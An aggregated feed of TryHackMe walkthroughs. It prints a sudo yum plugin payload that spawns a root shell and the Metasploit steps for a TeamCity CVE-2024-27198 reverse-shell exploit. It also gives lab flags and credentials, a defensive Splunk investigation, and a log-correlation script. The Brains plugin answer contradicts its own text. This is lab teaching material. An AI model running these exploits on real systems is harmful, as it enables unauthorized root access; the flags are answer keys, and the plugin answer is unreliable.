(ALL) NOPASSWD: /usr/bin/yum

I verified the OS version:

cat /etc/redhat-release
CentOS Linux release 7.7.1908 (Core)

Using GTFOBins, I found that jjameson could run yum with NOPASSWD, which allowed me to escalate privileges. I pasted the following code directly into the terminal:

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y

This gave me a root shell.

Capturing the Root Flag

Finally, I read the root flag:

cat /root/root.txt
eec3d53292b1821868266858d7fa6f79

Conclusion

The Daily Bugle room on TryHackMe was a challenging Red Team exercise that tested both web and system exploitation skills. From Joomla vulnerabilities and SQL injection to deploying a PHP reverse shell and escalating privileges on Red Hat Linux via GTFOBins, I successfully captured both user and root flags. This room highlights the importance of thorough enumeration, vulnerability research, and creative privilege escalation — an excellent challenge for anyone honing penetration testing skills.

Daily Bugle — TryHackMe Walkthrough: Joomla Exploitation & Red Hat Privilege Escalation was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
infosecwriteups.com
September 22, 2025 at 2:05 PM
Advent of Cyber 2024 [ Day 13 ] Writeup with Answers | TryHackMe Walkthrough
It came without buffering! It came without lag! Continue reading on InfoSec Write-ups »
infosecwriteups.com
December 17, 2024 at 2:02 PM
Brains —  TryHackMe Walkthrough
Brains — TryHackMe Walkthrough

The city forgot to close its gate.

Introduction

The Brains room on TryHackMe challenges you to exploit a TeamCity 2023.11.3 server (CVE‑2024‑27198) to gain a shell, capture the user flag, and perform forensic analysis using Splunk to find backdoor users, malicious packages, and uploaded plugins.

Task 1 Red: Exploit the Server!

Reconnaissance

I started with an aggressive Nmap scan to enumerate services and versions:

nmap -sV -sC -A <ip>

Important findings from the scan:
22/tcp — ssh — OpenSSH 8.2p1 (Ubuntu)
80/tcp — http — Apache/2.4.41 (Ubuntu) — page title: Maintenance.
50000/tcp — HTTP service — returned TeamCity maintenance HTML and headers (appears to be TeamCity).

Web enumeration

I navigated to the web server on port 80 first and saw a simple maintenance page. That didn’t reveal much immediately beyond the server header and that the site was intentionally showing maintenance. Visiting 50000 revealed a TeamCity management interface with an accessible login/maintenance page.

Vulnerability reconnaissance

I confirmed the TeamCity login shows 2023.11.3, and Rapid7’s analysis of CVE‑2024‑27198 (authentication‑bypass → unauthenticated RCE) matches what I found — Rapid7 documents exploit details and remediation. (Rapid7)

Exploitation

I launched Metasploit and used the TeamCity RCE module, configured a reverse handler, and ran the exploit:

msfconsole -q
use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198
set LHOST tun0
set LPORT 53
set RHOST <ip>
set RPORT 50000
run

Metasploit identified the target as vulnerable and created an auth token, uploaded the malicious plugin, and delivered the payload. The module opened a meterpreter session:

[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9...
[*] Uploading plugin: YAgxHifR
[*] Sending stage (58073 bytes) to 10.201.28.176
[*] Deleting the plugin...
[+] Deleted /opt/teamcity/TeamCity/work/Catalina/localhost/ROOT/TC_147512_YAgxHifR
[+] Deleted /home/ubuntu/.BuildServer/system/caches/plugins.unpacked/YAgxHifR
[*] Meterpreter session 1 opened (10.17.30.120:53 -> 10.201.28.176:55558)

Important: the exploit used LPORT=53, so I had to stop my local DNS/service using port 53 (e.g., systemd-resolved/named) first to free the port.

Capturing the user flag

After getting the meterpreter shell, I listed files and read the user flag:

meterpreter > cat flag.txt
THM{faa9bac345709b6620a6200b484c7594}

Task 2 Blue: Let’s Investigate

After exploiting the box I switched to the Blue/Forensics side of the lab to investigate what the attacker left behind. I deployed the Splunk machine and waited a few minutes for the instance to come up.

Splunk URL: http://MACHINE_IP:8000
Credentials: Username: splunk — Password: analyst123

After logging in I landed on the Splunk Enterprise dashboard. I navigated to Search & Reporting to start looking through collected logs. From the Search app I opened Data Summary and filtered by source. I selected /var/log/auth.log to focus on authentication events. The auth log is the right place to look for useradd events and other account activity.

To find account creation events I ran a simple search over the auth log:

source="/var/log/auth.log" useradd "new user"

Then I expanded the time picker from the default (last 24 hours) to All time so I wouldn’t miss older events. The search returned a user creation entry showing the attacker created a backdoor account named eviluser.

Question: What is the name of the backdoor user which was created on the server after exploitation?
Answer: eviluser

Installed package

To find packages installed around the same time the backdoor account was created I searched the dpkg log in Splunk. I ran:

source="/var/log/dpkg.log" date_month="july" date_mday="4" *install*

I expanded the time picker to All time and filtered to the host we were investigating.

Question: What is the name of the malicious-looking package installed on the server?
Answer: datacollector

Plugin upload

To identify the plugin the attacker uploaded during exploitation I searched TeamCity activity logs in Splunk with:

source="/opt/teamcity/TeamCity/logs/teamcity-activities.log" *plugin*

I set the time range to All time and filtered the host. The logs revealed the uploaded plugin YAgxHifR and its actions, matching the Metasploit output.

Question: What is the name of the plugin installed on the server after successful exploitation?
Answer: AyzzbuXY.zip

Conclusion

The Brains room on TryHackMe offered a complete journey from offensive exploitation to forensic analysis. I successfully exploited a vulnerable TeamCity 2023.11.3 instance (CVE‑2024‑27198) to gain a meterpreter shell, captured the user flag, and then shifted to Blue Team tasks to investigate the attacker’s footprints. Using Splunk, I identified the backdoor user, malicious package, and uploaded plugin, gaining hands-on experience in post-exploitation analysis and log investigation. This room is perfect for anyone looking to practice real-world web app exploits, RCE techniques, and forensic log analysis. Following this walkthrough, you should feel confident combining offensive and defensive skills to both compromise and analyze systems safely.

Brains — TryHackMe Walkthrough was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
infosecwriteups.com
September 28, 2025 at 7:55 AM
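The three Splunk searches in the Blue task above (useradd events in auth.log, installs in dpkg.log, plugin activity in the TeamCity log) can be reproduced offline and correlated in time. The script below is an added example written for this page, not code from the room or its author: it parses constructed sample lines for each of the three sources and flags new users and fresh package installs that land inside a short window after a plugin upload, which is the "around the same time" reasoning the walkthrough applies by hand. The auth.log and dpkg.log line formats are the real shadow-utils and dpkg formats; the teamcity-activities.log line layout and the year assumed for syslog timestamps are assumptions, as is every sample value except the user and package names taken from the walkthrough.

```python
"""Offline correlation of auth.log, dpkg.log and TeamCity plugin activity.

All log lines below are CONSTRUCTED for illustration; they are not captured
from the TryHackMe machine.  The TeamCity line layout is an assumption.
"""
from __future__ import annotations

import re
from datetime import datetime, timedelta

# auth.log (syslog) lines carry no year, so one has to be assumed when
# correlating with sources that do.  Assumption for the constructed sample.
SYSLOG_YEAR = 2024

AUTH_LOG = """\
Jul  4 08:00:00 brains useradd[900]: new user: name=deploy, UID=1001, GID=1001, home=/home/deploy, shell=/bin/bash
Jul  4 10:02:11 brains sshd[1201]: Accepted publickey for ubuntu from 10.0.0.5 port 51234 ssh2
Jul  4 10:05:43 brains useradd[2210]: new user: name=eviluser, UID=1002, GID=1002, home=/home/eviluser, shell=/bin/bash, from=/dev/pts/1
Jul  4 10:05:44 brains usermod[2215]: add 'eviluser' to group 'sudo'
"""

DPKG_LOG = """\
2024-07-04 10:07:12 startup packages configure
2024-07-04 10:07:15 install datacollector:amd64 <none> 1.0-1
2024-07-04 10:07:16 status installed datacollector:amd64 1.0-1
2024-07-04 10:08:01 upgrade libc6:amd64 2.31-0ubuntu9.14 2.31-0ubuntu9.15
"""

# Assumed layout; real teamcity-activities.log lines may differ in wording.
TEAMCITY_LOG = """\
[2024-07-04 10:03:55,010]   INFO - s.buildServer.ACTIVITIES - Plugin "AyzzbuXY.zip" was uploaded by "admin"
[2024-07-04 10:03:58,220]   INFO - s.buildServer.ACTIVITIES - Plugin "AyzzbuXY.zip" was deleted by "admin"
[2024-07-04 10:15:00,000]   INFO - s.buildServer.ACTIVITIES - Build configuration "Deploy" was created by "dev"
"""

# useradd logs "new user: name=..., UID=..., GID=..., home=..., shell=..." (the
# trailing "from=" field only exists on newer shadow-utils, so it is optional).
USERADD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ useradd\[\d+\]: new user: "
    r"name=(?P<name>[^,]+), UID=(?P<uid>\d+), GID=(?P<gid>\d+), "
    r"home=(?P<home>[^,]+), shell=(?P<shell>[^,\s]+)"
)
# dpkg.log: "<date> <time> install <pkg>[:arch] <old-version> <new-version>";
# "<none>" as the old version marks a first-time install rather than a reinstall.
DPKG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) install "
    r"(?P<pkg>[^: ]+)(?::\S+)? (?P<old>\S+) (?P<new>\S+)$"
)
PLUGIN_RE = re.compile(
    r'^\[(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d),\d+\].*'
    r'Plugin "(?P<plugin>[^"]+)" was (?P<action>uploaded|deleted)'
)


def _syslog_ts(stamp: str) -> datetime:
    return datetime.strptime(f"{SYSLOG_YEAR} {stamp}", "%Y %b %d %H:%M:%S")


def find_new_users(auth_log: str) -> list[dict]:
    """Offline equivalent of: source="/var/log/auth.log" useradd "new user"."""
    hits = []
    for line in auth_log.splitlines():
        m = USERADD_RE.search(line)
        if m:
            rec = m.groupdict()
            rec["when"] = _syslog_ts(rec.pop("ts"))
            hits.append(rec)
    return hits


def find_installed_packages(dpkg_log: str) -> list[dict]:
    """Offline equivalent of: source="/var/log/dpkg.log" *install*."""
    hits = []
    for line in dpkg_log.splitlines():
        m = DPKG_RE.search(line)
        if m:
            rec = m.groupdict()
            rec["when"] = datetime.strptime(rec.pop("ts"), "%Y-%m-%d %H:%M:%S")
            rec["fresh"] = rec["old"] == "<none>"
            hits.append(rec)
    return hits


def find_plugin_events(teamcity_log: str) -> list[dict]:
    """Offline equivalent of the *plugin* search over teamcity-activities.log."""
    hits = []
    for line in teamcity_log.splitlines():
        m = PLUGIN_RE.search(line)
        if m:
            rec = m.groupdict()
            rec["when"] = datetime.strptime(rec.pop("ts"), "%Y-%m-%d %H:%M:%S")
            hits.append(rec)
    return hits


def correlate(auth_log: str, dpkg_log: str, teamcity_log: str,
              window_minutes: int = 15) -> dict:
    """Users created and packages first installed within `window_minutes`
    after each plugin upload.  A plugin that was uploaded and then deleted
    seconds later still leaves its upload event in the activity log."""
    uploads = [e for e in find_plugin_events(teamcity_log) if e["action"] == "uploaded"]
    out = {"plugins": [e["plugin"] for e in uploads], "users": [], "packages": []}
    for up in uploads:
        lo, hi = up["when"], up["when"] + timedelta(minutes=window_minutes)
        out["users"] += [u["name"] for u in find_new_users(auth_log) if lo <= u["when"] <= hi]
        out["packages"] += [p["pkg"] for p in find_installed_packages(dpkg_log)
                            if p["fresh"] and lo <= p["when"] <= hi]
    return out


if __name__ == "__main__":
    print(correlate(AUTH_LOG, DPKG_LOG, TEAMCITY_LOG))
```

The pre-existing "deploy" account created two hours earlier is reported by find_new_users but dropped by correlate, and the libc6 upgrade is ignored because its old version is not "<none>"; the time window does the same job as the walkthrough's date_month/date_mday filters. Note that the Metasploit output above shows the plugin being deleted immediately after use, which is why the activity log, not the plugin directory, is the place to recover its name.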
Peeking Inside Malware’s Toolbox: An Intro to REMnux Hey, fellow digital detectives and malware hunters! 👋 Ever found a suspicious file and wondered what secrets it holds? Is it harmless, or ...

#tryhackme-walkthrough #tryhackme #digital-forensics #tryhackme-writeup #malware-analysis

Original post on systemweakness.com
systemweakness.com
November 2, 2025 at 8:55 PM
New video has dropped! This week we have a walkthrough of the TryHackMe room, Mr Robot!
youtu.be/kIBTjzDrQ_E
August 24, 2023 at 3:00 PM